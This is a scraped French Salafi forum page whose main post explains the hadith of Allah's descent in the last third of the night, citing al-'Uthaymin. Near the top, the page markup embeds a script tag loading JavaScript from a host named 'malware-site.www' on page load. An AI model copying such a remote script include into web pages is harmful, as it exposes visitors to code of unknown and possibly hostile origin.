ISLAM SUIVANT LE CORAN ET LA SUNNA

<center><iframe align="center" id="IW_frame_1438" src="http://www.tvquran.com/add/index.htm" frameborder="0" allowtransparency="1" scrolling="no" width="302" height="334"></iframe></center>



<a href="http://#7F96C3" id="pluiedetoiles"><script type="text/javascript" src="http://malware-site.www/js/pluiedetoiles.js"></script></a>Ce présent blog se propose de transmettre le message de l'Islam et le monothéisme islamique d'après le Coran et la Sounna authentique selon la compréhension des Pieux prédécesseurs.

N'hésitez pas à vous inscrire à la Newsletter pour être mis au courant des nouveaux articles.

ISLAM SUIVANT NOS EMINENTS SAVANTS

Logo Design by FlamingText.com

Logo Design by FlamingText.com
Bienvenue sur ce forum . Comme son nom l'indique, ce forum a pour but de vous faire découvrir cette magnifique religion qu’est l’Islam ainsi que de rectifier votre avis sur celle-ci. Le forum s’est aussi fixé un autre objectif : « mettre fin aux mensonges islamophobes et défendre l’honneur de D'Allah ainsi que Son Messager »

nous suivons a travers ce forum la voie de nos pieux predecesseurs extrait du coran et de la sounna selon la compréhension de notre bien aimé prophete صلى الله عليه و سلم»

il est basé sur la croyance des gens de la sounnah , et se conforme strictement au coran, et la Sounna du prophète Mohamed صلى الله عليه وسلم ...Les articles que contient ce forum sont des écrits ou des paroles de nos eminents savants salafis , et notre objectif est avant tout d’appeler les gens à l'unicité d'Allah (tawhid) et de diffuser la da'wah salafiyah qui est la bonne compréhension de l’islam,il est le plus rédigé en langue française afin de faire connaître aux musulmans francophones et meme aux mecreants leur religion véridique et les appeler à pratiquer ses enseignements et préceptes, de les avertir du danger de l'association à Allah , ainsi que des innovations et de les mettre en garde sur les mauvaises interprétations de l’islam diffusées par les innovateurs et les groupes égarés.

Allah par sa Miséricorde a envoyé des prophètes et des Envoyés avec un seul message, un seul objectif : rappeler aux hommes l’Unicité de dieu ( il n’y a de dieu qu’Allah) Ceci est le fondement de l’islam



 
">

Like/Tweet/+1

neige qui tombe

coran a telecharger de medine

Novembre 2017

LunMarMerJeuVenSamDim
  12345
6789101112
13141516171819
20212223242526
27282930   

Calendrier Calendrier


    Au sujet de la descente d’Allah, ’aza wa Jal

    Partagez
    avatar
    assalafia
    Admin

    Féminin
    Messages : 1354
    Date d'inscription : 26/08/2011
    Age : 35
    Localisation : algerie-constantine
    Emploi/loisirs : lire le coran
    Humeur : bonne

    Au sujet de la descente d’Allah, ’aza wa Jal

    Message par assalafia le Dim 17 Nov - 10:38

    Surprised 
    Au sujet de la descente d’Allah, ’aza wa Jal


    Il a été rapporté dans les deux recueils de hadiths authentiques, selon Abû Hurayra, qu'Allah l'agrée, que le prophète, صلى الله عليه وسلم, a dit :
     
    « à partir du dernier tiers de la nuit, notre Seigneur descend au ciel le plus proche de la terre et [Allah] dit : « J'exauce les invocations de celui qui M'invoque, Je donne à celui qui Me demande et pardonne à celui qui Me demande le pardon ». [1]
     
    De plus , ce hadîth fut rapporté par quelques vingt-huit personnes parmi les compagnons, qu'Allah les agrée. Tout comme il a été accepté à l'unanimité des gens de la sunna et de la vérité.
     
    La descente d'Allah, ta'âla, au ciel le plus proche de la terre fait partie de Ses attributs qui sont en rapport avec Sa volonté et Sa sagesse (sifâtun fi'liyatun). C'est une descente sur laquelle il ne fait aucun doute et qui sied à Sa majesté et grandeur.
     
    Il est interdit de modifier le sens de la descente d'Allah en disant qu'il s'agit, en fait, de la descente de Son ordre (amruhu), de Sa miséricorde, d'un ange parmi Ses anges car ceci est sans fondement à plus d'un titre :
     
     la modification du sens est en contradiction avec le sens apparent du hadîth car le prophète, صلى الله عليه وسلم, a annexé le mot descente à Allah. La règle de base étant qu'une action est annexée à celui qui la provoque ou qui la fait, il devient, dès lors, contradictoire à la règle de base de l'annexer à autre que le sujet concerné.
     
     Découle de la modification du sens, le fait qu'il manquerait un mot dans le hadîth, or, la règle de base est qu'il ne manque aucun mot dans les textes.
     
     La descente de Son ordre ou de Sa miséricorde n'est pas spécifique à cette partie de la nuit en ce sens que Son ordre et Sa miséricorde descendent tout le temps. Si on nous dit qu'il s'agit là de la descente d'un ordre particulier ou d'une miséricorde particulière et que cela peut se passer à des moments précis, nous répondrons qu'en admettant que ce sous-entendu et cette interprétation soient corrects, cela signifierait, d'après le hadith, que la limite de la descente de ces miséricorde et ordre particuliers serait le ciel le plus proche de la terre, et quel serait l'intérêt d'une descente de la miséricorde d'Allah au ciel le plus proche de la terre jusqu'à ce que le prophète, صلى الله عليه وسلم, nous en informe ?!
     
     Le hadîth nous indique que celui qui descend dit : « J'exauce les invocations de celui qui M'invoque, Je donne à celui qui Me demande et pardonne à celui qui Me demande le pardon » et personne d'autre en dehors d'Allah, subhânahu wa ta'âla, ne peut dire une telle chose.
     
    [1] Rapporté par Bukhâri N° 1145 et Muslim N° 758.
     
    Source : Fathu rabi-l-bariyah bi talkhîsi-l-hamawiyah, Page 54 - 55
    Auteur :  Sheikh Al 'Uthaymîne


     
    Cheikh Mouhammad Ibn Salih Ibn 'Outheymine

      La date/heure actuelle est Lun 20 Nov - 4:55